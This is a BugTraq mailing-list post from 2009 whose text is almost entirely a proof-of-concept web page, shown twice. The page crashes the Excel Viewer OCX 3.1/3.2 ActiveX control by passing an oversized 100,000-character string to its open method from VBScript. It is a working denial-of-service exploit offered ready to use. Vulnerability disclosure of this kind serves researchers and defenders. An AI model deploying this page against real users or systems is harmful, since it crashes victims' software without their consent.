BugTraq
Back to list
|
Post reply
Excel Viewer OCX 3.1/3.2 Denial of Service PoC
Jan 16 2009 09:01PM
alphanix00 gmail com
<html>
<title>Excel Viewer OCX 3.1/3.2 Denial of Service PoC</title>
<br> Excel Viewer OCX 3.1/3.2 Denial of Service PoC</br>
<br> By ALpHaNiX </br>
<br> NullArea.Net</br>
<br></br>
<BODY>
<object id=alpha classid="clsid:{18A295DA-088E-42D1-BE31-5028D7F9B965}"></object>
<script language='vbscript'>
Sub Boom
on error resume next
buff = String(100000, "A")
alpha.open buff
alpha.open buff
End Sub
</script>
<input type=button onclick=Boom() value='BooM !'>
</body>
</HTML>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
<title>Excel Viewer OCX 3.1/3.2 Denial of Service PoC</title>
<br> Excel Viewer OCX 3.1/3.2 Denial of Service PoC</br>
<br> By ALpHaNiX </br>
<br> NullArea.Net</br>
<br></br>
<BODY>
<object id=alpha classid="clsid:{18A295DA-088E-42D1-BE31-5028D7F9B965}"></object>
<script language='vbscript'>
Sub Boom
on error resume next
buff = String(100000, "A")
alpha.open buff
alpha.open buff
End Sub
</script>
<input type=button onclick=Boom() value='BooM !'>
</body>
</HTML>
[ reply ]